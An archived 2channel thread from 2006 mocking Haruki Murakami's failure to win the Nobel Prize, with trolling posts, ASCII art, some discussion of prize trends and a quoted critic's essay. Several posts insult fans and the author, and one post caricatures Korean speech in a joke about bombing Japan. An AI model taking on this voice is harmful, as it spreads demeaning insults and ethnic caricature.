佐藤藍子自重しろ

177 :吾輩は名無しである:2006/10/12(木) 20:24:09
以降、虫以下の知能しかない村上春樹信者の
「やれやれ、どうせとれないと思ってたよ」
が高確率で続きますwwww

178 :吾輩は名無しである:2006/10/12(木) 20:24:43
やれやれ、どうせとれないと思ってたよ

179 :吾輩は名無しである:2006/10/12(木) 20:25:18
やれやれ、どうせとれないと思ってたよ

180 :虫以下の知能しかない村上春樹信者:2006/10/12(木) 20:27:35
やれやれ、どうせとれないと思ってたよ

181 :吾輩は名無しである:2006/10/12(木) 20:44:08
やれやれ、ほんとにとれると思ってたし正直くやしいw

182 :吾輩は名無しである:2006/10/12(木) 20:44:48

        /  -‐‐‐‐‐‐‐--´´ ̄ ''''''''''''''''''''''''ー‐----、/
      /   ノ   ▲                 ヽ  ̄ ̄
     .i´    i´     ■  ∧               ヽ
     i    i      ■  .i.●i      ;::;:;:;:;       ヽ
    i     i     ■  ∨ノ   ,-、 ;:;:;/ノヾヽ    ;:;:i
    i     `、    ‐-   ー    ・ ;:;:;《 |  | )   ;:;:;:;::i
    i     ´´    -‐   ‐    ・ ;:;:;:《 |  | )   :;:;:;:;:;)
     i     i     ■  ∧ヽ  `‐´ ;:;丶ヽノノ    :;:;:;::i
     .i    i     .■  i.●i      ;:;;:;::       ;:;:;i
     i、    i     ■  ∨                ノ
      ヽ   `ゞ   .▼                 /  _
       ヽ、    ‐‐‐‐‐‐‐‐‐‐、____,,,,,,,,,,,,,,,,,,,,,,,,,----‐‐‐ヽ

           ショックです


183 :浅田:2006/10/12(木) 20:54:20
こんな田舎臭い作家がとれるわけないんだよね。

184 :吾輩は名無しである:2006/10/12(木) 20:56:30
兵庫県だしな

185 :蓮實:2006/10/12(木) 20:57:26
この糞野郎ははそもそも小説家じゃないしな。

186 :島田:2006/10/12(木) 20:58:10
くだらないファンタジー作家がとれるわけない。

187 :ドラゴン:2006/10/12(木) 21:00:09
村上春樹という作家はうすら寒いものを感じますね。

188 :吾輩は名無しである:2006/10/12(木) 21:02:30
m9(^Д^)9mプギャー

189 :吾輩は名無しである:2006/10/12(木) 21:03:04
村上りゅうと比べられても・・・・・・

190 :吾輩は名無しである :2006/10/12(木) 21:08:37
信者もアンチも受賞するまで毎年大騒ぎかw


191 :大江:2006/10/12(木) 21:11:55
残念だったね、ムラカミハルキくん。
でも中国では大人気じゃないか!
嫉妬を感じるよw

192 :吾輩は名無しである:2006/10/12(木) 21:12:45
 とってもとらなくてもどっちだっていい人なんだから。だいたい
ユングで固めた小説がカフカ賞を獲ること自体、笑わせる話であって、
カフカは地下の「巣穴」で小指で眉をなぞりながら笑っているに違い
ない。

193 :吾輩は名無しである:2006/10/12(木) 21:12:59
ひ、酷い言われよう((((ll゜Д゜)))

194 :吾輩は名無しである:2006/10/12(木) 21:14:15
イグ・ノーベル賞でも狙っとけw

195 :吾輩は名無しである:2006/10/12(木) 21:15:04
小確幸を逃したな。

196 :吾輩は名無しである:2006/10/12(木) 21:15:05
ユングで固めた、ってうまいこと言ったつもりなんでしょうかね


197 :吾輩は名無しである:2006/10/12(木) 21:19:00
間違いではないな

198 :吾輩は名無しである:2006/10/12(木) 21:20:27
>>190
今年が最大のチャンスだったっしょ
地域やカフカ賞と有利な条件がそろってた
信者の皆さん残念でしてた

199 :吾輩は名無しである:2006/10/12(木) 21:21:42
まあ今年無理だったのなら当分ないな
そもそも他にやっとくべき人がいないわけでもないし

200 :吾輩は名無しである:2006/10/12(木) 21:24:46
今年はアジア枠が有力、おまけにカフカ賞受賞者が
二年連続来てるってので
一応盛り上がったってのもあるからな
次盛り上がるのは春樹がスウェーデンを舞台にした小説
出した頃だな

201 :吾輩は名無しである:2006/10/12(木) 21:28:00
まあ、あれだな。
信者が糞スレ立てまくって大騒ぎしたから
ざまあみろとしか言いようがない罠。
というわけで

ざ ま あ み ろ

202 :吾輩は名無しである:2006/10/12(木) 21:30:05
次は大江賞第一回受賞の平野啓一郎君です

203 :吾輩は名無しである:2006/10/12(木) 21:30:28
L'Arc〜en〜Cielだろうね

204 :吾輩は名無しである:2006/10/12(木) 21:30:50
春樹オタ死亡wwwwwwwwwwwww

205 :吾輩は名無しである:2006/10/12(木) 21:33:20
次はばなな、辻と熾烈な争いをくりひろげて欲しい

206 :吾輩は名無しである:2006/10/12(木) 21:34:00
平野辻ありえなす

207 :吾輩は名無しである:2006/10/12(木) 21:36:43
辻はいろんなトコからパクってんな。
個人的には面白かったけど。

208 :吾輩は名無しである:2006/10/12(木) 21:40:10
村上春樹にやるくらいなら辻でもばななでも
杉本彩でも誰でもいいよ。

209 :大江:2006/10/12(木) 21:46:02
「やあやあ、残念だったね青年」

210 :吾輩は名無しである:2006/10/12(木) 21:54:26
この人って確か帝京大学文学部卒だったよね。

211 :吾輩は名無しである:2006/10/12(木) 21:55:33
そうなんだ

212 :吾輩は名無しである:2006/10/12(木) 21:58:15
老人と海などの作品には文庫の解説目録に「ノーベル文学賞」って
添え書きがあるじゃん

ハル気も今年から「ノーベル文学賞候補」って
添え書きすればいいんじゃね?
エンターテイメントとしてのおもしろ度が倍増 ww

「ノーベル文学賞候補」って帯に w

「100パーセントのノーベル文学賞候補」

213 :吾輩は名無しである:2006/10/12(木) 22:01:04
カラマーゾフの続編を書けるのは春樹だけ

とかいうのもあったなw

214 :吾輩は名無しである:2006/10/12(木) 22:19:05
>>210
早稲田

215 :吾輩は名無しである:2006/10/12(木) 22:40:01
村上春樹は、早稲田大学。
中上健次は、早稲田予備校。

216 :吾輩は名無しである:2006/10/12(木) 22:52:44
日本のノーベル文学賞受賞者は二人とも東大卒。
ノーベル文学賞受賞者は、やはり各国を代表するような大学を出ていることが多い。
が、一方で、高卒・中卒・小卒、あるいは「まともに教育を受けなかった」という
受賞者も存在する。
ノーベル賞の自然科学部門は受賞者のほとんどが大学院を出て博士なのと比べると
学歴はさほど関連が無いといえる。

村上春樹は早稲田だからダメだというが、早稲田か東大かというのは選考に影響
するとは思えないのだが・・・・

217 :吾輩は名無しである:2006/10/12(木) 23:01:21
そりゃ、選ぶ側からすれば外国の大学なんてどうでもいい話。
にちゃんでは、話のスケールが小さくなる。

218 :吾輩は名無しである:2006/10/12(木) 23:03:19
東大なんて世界的に見れば「圏外」の大学だろ
大した差はない

219 :吾輩は名無しである:2006/10/12(木) 23:05:04
すもうでは日大相撲部が名門なのと同様、作家に限れば早稲田が一番
の名門だろう、東大より。

220 :吾輩は名無しである:2006/10/12(木) 23:44:58
学生の総数にたいする割合はどうなの?

221 :遊介 ◆m0yPyqc5MQ :2006/10/12(木) 23:45:06
だめだったわけかw


よかったですよ。
ノルウェイの二の舞になるところでした。
 これ以上、友人失ってカネ稼いでも仕方ないでしょうw

マラソンがんばって下さい。

222 :吾輩は名無しである:2006/10/12(木) 23:48:25
>>221 君は本当に下劣というか、下品なやつだね。

ほとほと感心するよ。

223 :吾輩は名無しである:2006/10/12(木) 23:49:18
マラソンは評価出来る。
不健康な作家が多すぎるからな。

224 :吾輩は名無しである:2006/10/12(木) 23:52:58
むしろ最近、健康的な作家が増えすぎてる。
肺病の文学青年もがんがれ

225 :遊介 ◆m0yPyqc5MQ :2006/10/12(木) 23:53:50
むしろホッとしましたね、ぼくは。


「僕達の大好きな村上春樹」が権威になったらどうなっちゃうかと思ったw
たぶん、みんなきゅうに深夜のマックだかなんだかで
「やれやれ。ここのチキンターキーは化学飼料で染まっている」とか100yenコーヒー飲みながら言ってたよww

よかった
早稲田内ゲバの体制反抗ハゲが受賞しなくてwww

226 :吾輩は名無しである:2006/10/12(木) 23:58:57
マラソンはやめたほうがいいんじゃないか。
急性心不全でポックリ逝っちゃうかもしれないし。
ウォーキングに変えるべきだ。

227 :遊介 ◆m0yPyqc5MQ :2006/10/12(木) 23:59:18
はるきちが何年生きてもなんだかもう捕れないような気がしますねww
西洋の学術的権威に鼻で笑い飛ばされたような気分w

 まあ、たくさんの読者に愛されることこそ作家の最高の幸せですから。
良い勉強になったじゃないすかwwマラソンしながら汗に隠して泣いて下さいww


 さてこれで、日本の作家で次にとれそうなのは……
えーと

もう、綿矢か僕くらいだなww

あわれ日本文学
オタク文化のおかげで世界から周縁化しはじめとるw

228 :遊介 ◆m0yPyqc5MQ :2006/10/13(金) 00:08:16
たとえば将来のぼくや、綿矢は、
日本でこそ人気を博せても、たぶんあまりにも日本らしすぎるというか
いわばちょっと文化色が強すぎるから、
世界情勢で相当に政治的な幸運が来ないともらえないでしょうね。


次に可能性としてあるのは、平野君でしょうね。
ある意味、西洋マニアだからwキリスト教神学とか東洋ではマニアックなの学びすぎww
 官使留学経験もある。

彼がもしきちんとこれからも勉強し続けていけば、
西洋の馬鹿はきっと「いい子いい子」してくれるでしょう。

くっさ〜ww

ぼくなんかぜったい電話来たら切るもんwww
「たかが白人がなんの用や。おまえらとりあえず、中東の地雷撤去してから来い」とか言い捨ててねww
そして中国や韓国やインドネシア、つまり東アジアの為に書くよ。
だって独立自尊の日本文士だもん。
西洋くっさ〜wwだっさ〜


229 :遊介 ◆m0yPyqc5MQ :2006/10/13(金) 00:13:34
とりあえずあれですね。

神戸の港にでもいちど帰って、三日月に吠えてくださいww
「オーエー!!!」とwww


爆笑!
爆笑

あわれ過ぎる
風の歌を聴きすぎwww

230 :吾輩は名無しである:2006/10/13(金) 00:15:00
2ちゃんに中毒って、常駐してると
精神崩壊して沈んでくよな

美香もそうだった



231 :吾輩は名無しである:2006/10/13(金) 00:15:20
◆m0yPyqc5MQ

あんまりうざいから細工したからな。


232 :遊介 ◆m0yPyqc5MQ :2006/10/13(金) 00:30:20
これからはるきちは一体、どこへ向かって走り続けるんでしょうね。


ぼくは生まれ育った街の海へ行った。
そこで三時間泣いたw
こんなに泣いたのは産まれてはじめてだった。
「ぼくは、君たちが好きだ。
そうだ……ひっく、ひっく……ウウ……じゅるじゅる……のーべるが好きなんじゃないもんっ」
 やがてぼくはすっくと立ち上がり、どこへともなく歩き出した。
どこへ行ったらいいかわからなかったけれど、とにかく新しい場所へ行かなければならない。
貧乏くじ・浅田飴のえげつないルサンチマンに構っている暇はない。
僕にはもう世界文学史に遺すべき最大の総合小説の尻尾がみえているのだ。
後から陽子の声がした。


がんばれがんばれまらそん文士w♪d(⌒〇⌒)b♪世界の人気者ならいいじゃない

233 :吾輩は名無しである:2006/10/13(金) 09:54:44
ただの嵐じゃん

234 :吾輩は名無しである:2006/10/13(金) 19:58:21
いちばん安心したのは、大江だろう
春樹なんかといっしょくたにされたくないんだもん

235 :吾輩は名無しである:2006/10/13(金) 20:17:15
上位独占してた春樹スレが、一気に下がってて笑える

236 :吾輩は名無しである:2006/10/13(金) 21:22:12
大江=偽善

237 :吾輩は名無しである:2006/10/14(土) 07:22:14
大江は全部本気なとこが妙なんだよ

238 :吾輩は名無しである:2006/10/14(土) 19:54:10
 偽善=ユマニスムならそれあたってる。


239 :吾輩は名無しである:2006/10/21(土) 13:18:04
金正日「春樹がノーベル賞とったら、わが国で映像化するムニダ。」
盧泰愚「キムちゃん、太陽政策うまくゆかなかったからもう無理ニダ。」 
金正日「もうブッシュに電話して、来年、亡命してラスベガスで撮ることになっているソッソヨ。」
胡錦涛国家主席「その前に日本に原爆おとしてくれプッタカムニダ。」 (なぜかハングル調)
金正日「OK、OK。明日、ボタンを押す予定イッソヨ。」
プーチン大統領「それ、俺にやらせてくれジョ。」(なぜかハングル調)

240 :吾輩は名無しである:2006/10/26(木) 13:36:14
文学界11月号 沼野充義 西欧中心からマイノリティへ〜ノーベル文学賞

現在、日本では村上春樹が受賞するかどうかが一大関心事となているが、私見では可能性は少ないように思われる。村上氏が2006年度フランツカフカ賞を受賞してますます
可能性が高まったかのように言われているが、そもそもカフカ賞はチェコのカフカ協会とプラハ市が創設した賞で、中央ヨーロッパのインテリの文学の好みを
強く感じさせている。村上氏の受賞も「海辺のカフカ」というカフカをタイトルに冠した小説があったことが大きいのではないか。
たまたまイェリネク、ピンターとカフカ賞直後にノーベル賞を受賞する作家が続いたけれども、村上氏の作品は過去のカフカ賞受賞作家の作品とは明らかに異質で、
なんと言っても例外的に大衆人気が高く、ヨーロッパの知識人好みの批判的スタンスが弱い。最近のノーベル賞の傾向からすると、村上氏や彼と同じ程度に国際的なスターと
いえるミラン・クンデラなどは、ちょとポピュラーになりすぎてしまった感があって、かえって受賞は難しいのではないか。

241 :吾輩は名無しである:2006/11/03(金) 19:09:04
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★
全く春樹に注意を向けてない というより
最初注意して聞いてたのが
まるっきり中学生な内容だったので(「こどものころ読んで本当に衝撃を受けました」)、
あきれて注意して聞くのをやめ宙を見て
ゴミを払うしぐさをした

これは注目すべきしぐさである
すべてが崩れながら露見していく
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★

242 :吾輩は名無しである:2006/11/03(金) 19:15:40
241はニュース映像での
春樹スピーチのあいだの後ろの授賞側のチェコ老人のことね
http://www.youtube.com/watch?v=ehzKioEMGAI

243 :吾輩は名無しである:2006/11/09(木) 23:38:53
受賞用にコラムやインタビュー受けてたのが、没と
評論家が群像で逆切れしてたよw

244 :泣きますた:2006/11/12(日) 14:48:35
こういうスレ立てますた。

【泣きますた】村上春樹訳「グレート・ギャツビー」
http://book3.2ch.net/test/read.cgi/book/1163309958/l50

245 :吾輩は名無しである:2006/11/12(日) 14:51:47
>>240
中央ヨーロッパのインテリの文学の好みを
強く感じさせている

ヨーロッパの知識人好みの批判的スタンスが弱い

どっちなのYO?


246 :停止しました。。。:停止
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ

45 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)